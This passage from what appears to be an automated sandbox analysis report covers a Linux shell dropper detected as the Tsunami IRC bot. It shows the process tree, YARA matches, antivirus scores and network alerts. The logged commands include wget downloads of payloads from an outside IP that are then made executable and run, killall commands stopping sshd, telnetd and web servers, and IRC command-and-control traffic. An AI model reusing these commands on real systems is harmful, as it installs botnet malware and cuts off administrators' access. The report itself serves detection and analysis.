            • systemctl (PID: 7985, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8004, Parent: 7205)
            • systemctl (PID: 8004, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8039, Parent: 7205)
            • systemctl (PID: 8039, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8066, Parent: 7205)
            • systemctl (PID: 8066, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8093, Parent: 7205)
            • systemctl (PID: 8093, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8102, Parent: 7205)
            • systemctl (PID: 8102, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8142, Parent: 7205)
            • systemctl (PID: 8142, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8162, Parent: 7205)
            • systemctl (PID: 8162, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8191, Parent: 7205)
            • systemctl (PID: 8191, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7205, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop httpd.service
        • irq1 New Fork (PID: 7206, Parent: 6469)
        • sh (PID: 7206, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7222, Parent: 7206)
          • killall (PID: 7222, Parent: 7206, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mini_httpd
        • irq1 New Fork (PID: 7228, Parent: 6469)
        • sh (PID: 7228, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7232, Parent: 7228)
          • killall (PID: 7232, Parent: 7228, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 minihttpd
        • irq1 New Fork (PID: 7236, Parent: 6469)
        • sh (PID: 7236, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 7290, Parent: 7236)
            • sh New Fork (PID: 7292, Parent: 7290)
            • cat (PID: 7292, Parent: 7290, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/thttpd.pid
        • irq1 New Fork (PID: 7296, Parent: 6469)
        • sh (PID: 7296, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
        • irq1 New Fork (PID: 7344, Parent: 6469)
        • sh (PID: 7344, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
        • irq1 New Fork (PID: 7349, Parent: 6469)
        • sh (PID: 7349, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7363, Parent: 7349)
          • killall (PID: 7363, Parent: 7349, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 httpd
        • irq1 New Fork (PID: 7365, Parent: 6469)
        • sh (PID: 7365, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service telnetd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7379, Parent: 7365)
          • service (PID: 7379, Parent: 7365, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service telnetd stop
            • service New Fork (PID: 7398, Parent: 7379)
            • basename (PID: 7398, Parent: 7379, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7407, Parent: 7379)
            • basename (PID: 7407, Parent: 7379, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7436, Parent: 7379)
            • systemctl (PID: 7436, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7562, Parent: 7379)
              • service New Fork (PID: 7564, Parent: 7562)
              • systemctl (PID: 7564, Parent: 7562, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7565, Parent: 7562)
              • sed (PID: 7565, Parent: 7562, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7616, Parent: 7379)
            • systemctl (PID: 7616, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7626, Parent: 7379)
            • systemctl (PID: 7626, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7661, Parent: 7379)
            • systemctl (PID: 7661, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7671, Parent: 7379)
            • systemctl (PID: 7671, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7708, Parent: 7379)
            • systemctl (PID: 7708, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7742, Parent: 7379)
            • systemctl (PID: 7742, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7755, Parent: 7379)
            • systemctl (PID: 7755, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7788, Parent: 7379)
            • systemctl (PID: 7788, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7824, Parent: 7379)
            • systemctl (PID: 7824, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7856, Parent: 7379)
            • systemctl (PID: 7856, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7878, Parent: 7379)
            • systemctl (PID: 7878, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7905, Parent: 7379)
            • systemctl (PID: 7905, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7932, Parent: 7379)
            • systemctl (PID: 7932, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7959, Parent: 7379)
            • systemctl (PID: 7959, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7986, Parent: 7379)
            • systemctl (PID: 7986, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 8005, Parent: 7379)
            • systemctl (PID: 8005, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8043, Parent: 7379)
            • systemctl (PID: 8043, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8068, Parent: 7379)
            • systemctl (PID: 8068, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8094, Parent: 7379)
            • systemctl (PID: 8094, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8129, Parent: 7379)
            • systemctl (PID: 8129, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8153, Parent: 7379)
            • systemctl (PID: 8153, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8183, Parent: 7379)
            • systemctl (PID: 8183, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8210, Parent: 7379)
            • systemctl (PID: 8210, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8256, Parent: 7379)
            • systemctl (PID: 8256, Parent: 7379, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7379, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop telnetd.service
        • irq1 New Fork (PID: 7383, Parent: 6469)
        • sh (PID: 7383, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service sshd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7399, Parent: 7383)
          • service (PID: 7399, Parent: 7383, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service sshd stop
            • service New Fork (PID: 7401, Parent: 7399)
            • basename (PID: 7401, Parent: 7399, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7460, Parent: 7399)
            • basename (PID: 7460, Parent: 7399, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7465, Parent: 7399)
            • systemctl (PID: 7465, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7561, Parent: 7399)
              • service New Fork (PID: 7566, Parent: 7561)
              • systemctl (PID: 7566, Parent: 7561, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7567, Parent: 7561)
              • sed (PID: 7567, Parent: 7561, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7625, Parent: 7399)
            • systemctl (PID: 7625, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7652, Parent: 7399)
            • systemctl (PID: 7652, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7663, Parent: 7399)
            • systemctl (PID: 7663, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7705, Parent: 7399)
            • systemctl (PID: 7705, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7714, Parent: 7399)
            • systemctl (PID: 7714, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7744, Parent: 7399)
            • systemctl (PID: 7744, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7787, Parent: 7399)
            • systemctl (PID: 7787, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7792, Parent: 7399)
            • systemctl (PID: 7792, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7825, Parent: 7399)
            • systemctl (PID: 7825, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7860, Parent: 7399)
            • systemctl (PID: 7860, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7887, Parent: 7399)
            • systemctl (PID: 7887, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7906, Parent: 7399)
            • systemctl (PID: 7906, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7933, Parent: 7399)
            • systemctl (PID: 7933, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7960, Parent: 7399)
            • systemctl (PID: 7960, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7987, Parent: 7399)
            • systemctl (PID: 7987, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 8007, Parent: 7399)
            • systemctl (PID: 8007, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8048, Parent: 7399)
            • systemctl (PID: 8048, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8067, Parent: 7399)
            • systemctl (PID: 8067, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8095, Parent: 7399)
            • systemctl (PID: 8095, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8133, Parent: 7399)
            • systemctl (PID: 8133, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8160, Parent: 7399)
            • systemctl (PID: 8160, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8187, Parent: 7399)
            • systemctl (PID: 8187, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8219, Parent: 7399)
            • systemctl (PID: 8219, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8257, Parent: 7399)
            • systemctl (PID: 8257, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7399, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop sshd.service
        • irq1 New Fork (PID: 7403, Parent: 6469)
        • sh (PID: 7403, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7455, Parent: 7403)
          • killall (PID: 7455, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd
        • irq1 New Fork (PID: 7457, Parent: 6469)
        • sh (PID: 7457, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7464, Parent: 7457)
          • killall (PID: 7464, Parent: 7457, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 utelnetd
        • irq1 New Fork (PID: 7474, Parent: 6469)
        • sh (PID: 7474, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
          • sh New Fork (PID: 7477, Parent: 7474)
          • killall (PID: 7477, Parent: 7474, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 dropbear
        • irq1 New Fork (PID: 7479, Parent: 6469)
        • sh (PID: 7479, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 sshd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7532, Parent: 7479)
          • killall (PID: 7532, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd
        • irq1 New Fork (PID: 7533, Parent: 6469)
        • sh (PID: 7533, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7547, Parent: 7533)
          • killall (PID: 7547, Parent: 7533, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 lighttpd
        • irq1 New Fork (PID: 8393, Parent: 6469)
          • irq1 New Fork (PID: 8395, Parent: 8393)
          • sh (PID: 8395, Parent: 8393, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8397, Parent: 8395)
              • sh New Fork (PID: 8398, Parent: 8397)
              • cat (PID: 8398, Parent: 8397, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8402, Parent: 8397)
              • cat (PID: 8402, Parent: 8397, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8424, Parent: 8397)
              • killall (PID: 8424, Parent: 8397, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
            • rm (PID: 8397, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/tty0 /var/run/tty1 /var/run/tty2 /var/run/tty3 /var/run/tty4 /var/run/tty5 /var/run/tty6 /tmp/tt*
        • irq1 New Fork (PID: 9008, Parent: 6469)
    • sh New Fork (PID: 5876, Parent: 4579)
    • wget (PID: 5876, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq2 -O irq2
    • sh New Fork (PID: 6194, Parent: 4579)
    • chmod (PID: 6194, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq2
    • sh New Fork (PID: 6195, Parent: 4579)
    • chmod (PID: 6195, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq2
    • sh New Fork (PID: 6198, Parent: 4579)
    • irq2 (PID: 6198, Parent: 4579, MD5: unknown) Arguments: /usr/bin/qemu-mipsel ./irq2
    • sh New Fork (PID: 6199, Parent: 4579)
    • wget (PID: 6199, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O /var/tmp/pty
    • sh New Fork (PID: 6275, Parent: 4579)
    • chmod (PID: 6275, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/tmp/pty
    • sh New Fork (PID: 6280, Parent: 4579)
    • chmod (PID: 6280, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/tmp/pty
    • sh New Fork (PID: 6287, Parent: 4579)
    • pty (PID: 6287, Parent: 4579, MD5: 05e1c4a7333bfbd41d109ffc2f70a52a) Arguments: /var/tmp/pty
      • pty New Fork (PID: 6311, Parent: 6287)
    • sh New Fork (PID: 6288, Parent: 4579)
    • wget (PID: 6288, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O /var/run/pty
    • sh New Fork (PID: 6450, Parent: 4579)
    • chmod (PID: 6450, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/pty
    • sh New Fork (PID: 6456, Parent: 4579)
    • chmod (PID: 6456, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/pty
    • sh New Fork (PID: 6462, Parent: 4579)
    • sh New Fork (PID: 6463, Parent: 4579)
    • rm (PID: 6463, Parent: 4579, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/1sh
  • systemd New Fork (PID: 6356, Parent: 1)
  • sshd (PID: 6356, Parent: 1, MD5: 661b2a2da3b6c7d7ef41d0b9da1caa3b) Arguments: /usr/sbin/sshd -D
  • upstart New Fork (PID: 8551, Parent: 3310)
  • sh (PID: 8551, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8565, Parent: 8551)
    • date (PID: 8565, Parent: 8551, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8580, Parent: 8551)
    • apport-checkreports (PID: 8580, Parent: 8551, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 8934, Parent: 3310)
  • sh (PID: 8934, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8938, Parent: 8934)
    • date (PID: 8938, Parent: 8934, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8960, Parent: 8934)
    • apport-gtk (PID: 8960, Parent: 8934, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 8981, Parent: 3310)
  • sh (PID: 8981, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8982, Parent: 8981)
    • date (PID: 8982, Parent: 8981, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8997, Parent: 8981)
    • apport-gtk (PID: 8997, Parent: 8981, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
8337.1.0000000008048000.000000000805c000.r-x.sdmp | JoeSecurity_Tsunami | Yara detected Tsunami | Joe Security |
8337.1.0000000008048000.000000000805c000.r-x.sdmp | LinuxTsunami | unknown | unknown | 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
6287.1.0000000008048000.000000000805c000.r-x.sdmp | JoeSecurity_Tsunami | Yara detected Tsunami | Joe Security |
6287.1.0000000008048000.000000000805c000.r-x.sdmp | LinuxTsunami | unknown | unknown | 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
4831.1.0000000008048000.000000000805c000.r-x.sdmp | JoeSecurity_Tsunami | Yara detected Tsunami | Joe Security |

        Signature Overview

        AV Detection:

        Multi AV Scanner detection for submitted file
        Source: 1.sh, Virustotal: Detection: 16%
        Source: 1.sh, ReversingLabs: Detection: 24%
        Machine Learning detection for dropped file
        Source: /var/tmp/pty, Joe Sandbox ML: detected
        Source: /run/pty, Joe Sandbox ML: detected
        Source: /tmp/pty, Joe Sandbox ML: detected

        Networking:

        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
        Source: Traffic, Snort IDS: 2000345 ET TROJAN IRC Nick change on non-standard port 192.168.2.20:34156 -> 83.69.77.2:8080
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.227.124.42: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.226.157.40: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.47.24.237: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.248.72.10: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.224.191.8: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.84.231.63: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.94.125.110: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.110.224.22: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.143.93.162: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.153.30.139: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.251.87.111: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.91.105.7: -> 192.168.2.20:
        Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.251.5.203: -> 192.168.2.20:
        Uses IRC for communication with a C&C
        Source: unknown, IRC traffic detected: 192.168.2.20:34156 -> 83.69.77.2:8080 NICK x86|x|0|744924|ubuntu-a USER x00 localhost localhost :2021g
        Uses known network protocols on non-standard ports
        Source: unknown, Network traffic detected: IRC traffic on port 34156 -> 8080
        Source: unknown, Network traffic detected: IRC traffic on port 57642 -> 8080
        Source: unknown, Network traffic detected: IRC traffic on port 53028 -> 8080
        Source: global traffic, TCP traffic: 192.168.2.20:58902 -> 211.103.199.94:8080
        Source: global traffic, TCP traffic: 192.168.2.20:34156 -> 83.69.77.2:8080
        Source: global traffic, TCP traffic: 192.168.2.20:57642 -> 191.98.172.42:8080
        Source: global traffic, TCP traffic: 192.168.2.20:53028 -> 195.70.197.29:8080
        Source: /bin/sh (PID: 4581), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty0 -O /var/run/tty0
        Source: /bin/sh (PID: 4608), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty1 -O /var/run/tty1
        Source: /bin/sh (PID: 4644), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty2 -O /var/run/tty2
        Source: /bin/sh (PID: 4672), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty3 -O /var/run/tty3
        Source: /bin/sh (PID: 4705), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty4 -O /var/run/tty4
        Source: /bin/sh (PID: 4736), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty5 -O /var/run/tty5
        Source: /bin/sh (PID: 4768), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty6 -O /var/run/tty6
        Source: /bin/sh (PID: 4800), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O pty
        Source: /bin/sh (PID: 4832), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq0 -O irq0
        Source: /bin/sh (PID: 5286), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq1 -O irq1
        Source: /bin/sh (PID: 5876), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq2 -O irq2
        Source: /bin/sh (PID: 6199), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/tmp/pty
        Source: /bin/sh (PID: 6288), Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/run/pty
        Source: ./pty (PID: 4846), Socket: 127.0.0.1::63008
        Source: ./irq0 (PID: 5285), Socket: 127.0.0.1::42076
        Source: ./irq1 (PID: 5875), Socket: 127.0.0.1::42071
        Source: /usr/sbin/sshd (PID: 6356), Socket: 0.0.0.0::22
        Source: /usr/sbin/sshd (PID: 6356), Socket: [::]::22
        Source: unknown, TCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: global traffic, HTTP traffic detected: GET /.x/tty0 HTTP/1.1; User-Agent: Wget/1.17.1 (linux-gnu); Accept: */*; Accept-Encoding: identity; Host: 71.127.148.69; Connection: Keep-Alive
